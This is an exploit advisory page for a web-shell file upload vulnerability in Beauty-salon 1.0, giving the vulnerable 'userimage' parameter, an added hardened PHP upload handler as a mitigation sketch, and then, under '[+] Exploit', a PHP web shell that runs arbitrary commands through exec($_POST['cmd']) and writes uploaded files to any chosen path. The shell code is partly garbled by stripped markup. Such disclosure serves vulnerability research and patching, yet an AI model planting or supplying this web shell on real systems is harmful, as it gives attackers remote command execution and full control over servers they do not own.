Published on March 30th, 2023

Beauty Salon 1.0 Remote Shell Upload – Torchsec


## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 10.12.2022
## Vendor: https://code4berry.com/projects/beautysalon.php
## Software: https://code4berry.com/project%20downloads/beautysalon_download.php
## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt

## Description:
The `userimage` parameter in Beauty-salon-2022 is vulnerable to web shell file upload, leading to RCE.
NOTE: The user permissions of this system do not work correctly, and the
function does not sanitize its input properly.
An attacker can use an already created account belonging to someone who controls
this system and upload a malicious file through this vulnerability
(more precisely, the edit-image function performs no sanitizing), for any
account, and can then execute the file from anywhere on the external network.

Status: HIGH Vulnerability
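
A hardened handler for the `userimage` field, shown as an added mitigation example; it is not code from Beauty-salon or from the advisory. The function name `store_user_image()`, the storage path and the size limit are hypothetical, and the `fileinfo` extension is assumed to be enabled.

```php
<?php
declare(strict_types=1);

// Added mitigation sketch; not the vendor's or the advisory author's code.
// Assumptions: the form field is named `userimage` (from the advisory);
// store_user_image(), the upload directory and the size cap are hypothetical.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

function store_user_image(array $file, string $uploadDir): string
{
    if (!isset($file['error']) || is_array($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or malformed request.');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_IMAGE_BYTES) {
        throw new RuntimeException('File size not accepted.');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an HTTP upload.');
    }

    // Decide the type from the file's content, never from the client-supplied
    // filename or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted.');
    }

    // Server-generated name and extension: the original filename is discarded,
    // so a ".php" name never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store upload.');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

// Call only after the session is authenticated and authorized for the
// profile being edited, e.g.:
// $stored = store_user_image($_FILES['userimage'], '/var/app-data/profile-images');
```

Content checks alone do not stop an image that also carries script code, so the storage directory should sit outside the document root or be configured so the web server never executes scripts from it.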

[+] Exploit:

```php







http://www.w3.org/TR/html4/strict.dtd">



PHP Web Shell Ver 4.0 by nu11secur1ty

function FocusOut(obj)
{
if(obj.value == '')
obj.value = obj.defaultValue;
}


WebShell's Location = http://$_SERVER['REQUEST_URI'] ?>

HTTP_HOST =

REQUEST_URI =


onblur="FocusOut(document.cmd_exec.cmd)">





if(isset($_POST['exec']))
{
exec($_POST['cmd'],$result);

echo '----------------- < OutPut > -----------------';
echo '

';
foreach($result as $print)
{
$print = str_replace('<','<',$print);
echo $print . '
';
}
echo '

';
}
else echo '
';
?>

action="http://$_SERVER['REQUEST_URI'] ?>">

onfocus="FocusIn(document.file_upload.target)"
onblur="FocusOut(document.file_upload.target)">

if(isset($_POST['upload']))
{
$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);

if($check == TRUE)
echo '

The file was uploaded successfully!!

';
else
echo '

File Upload was failed...

';
}
?>

```

# Proof and Exploit:
[href](https://streamable.com/ewdmoh)

# m0e3:
[href](https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html)
